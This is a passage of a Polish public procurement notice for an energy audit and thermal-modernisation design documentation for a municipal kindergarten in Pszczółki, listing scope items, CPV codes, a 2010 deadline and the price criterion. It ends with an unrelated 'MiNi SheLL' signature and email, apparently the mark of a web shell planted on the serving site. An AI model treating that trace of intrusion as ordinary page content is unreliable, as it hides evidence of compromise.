4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej) wszystkich branż (architektura, konstrukcje, wod-kan, sanitarno-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994 r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów- wycenione w ramach wynagrodzenia za opracowanie dokumentacji). 
Wykonawca przeniesie na Zamawiającego prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji (w tym w wersji elektronicznej), objętych przedmiotem zamówienia.

Wskazane jest, aby Wykonawca dokonał wizji lokalnej miejsc przewidzianych na wykonanie usługi.

W dokumentacji należy uwzględnić stan techniczny poszczególnych elementów obiektów z dokładnym określeniem sposobu ich naprawy, wzmocnienia, zabezpieczenia oraz niezbędnych wymian.

Przedmiot zamówienia musi być objęty gwarancją i rękojmią 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 71.31.43.00-5, 71.22.10.00-3, 71.24.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sporządzenie audytu energetycznego i dokumentacji projektowej na termomodernizację budynku dla Przedszkola Gminnego Pszczółka Maja w Pszczółkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla budynku Przedszkola Gminnego Pszczółka Maja w Pszczółkach - kubatura obiektu 2991m3, pow. użytkowa 675,37 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3) Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego w 2 egzemplarzach oraz w wersji elektronicznej;
4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej) wszystkich branż (architektura, konstrukcje, wod-kan, sanitarno-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów - wycenione w ramach wynagrodzenia za opracowanie dokumentacji).

Wykonawca przeniesie na Zamawiającego prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji (w tym w wersji elektronicznej), objętych przedmiotem zamówienia.

Wskazane jest, aby Wykonawca dokonał wizji lokalnej miejsc przewidzianych na wykonanie usługi.

W dokumentacji należy uwzględnić stan techniczny poszczególnych elementów obiektów z dokładnym określeniem sposobu ich naprawy, wzmocnienia, zabezpieczenia oraz niezbędnych wymian.

Przedmiot zamówienia musi być objęty gwarancją i rękojmią 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 71.31.43.00-5, 71.22.10.00-3, 71.24.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com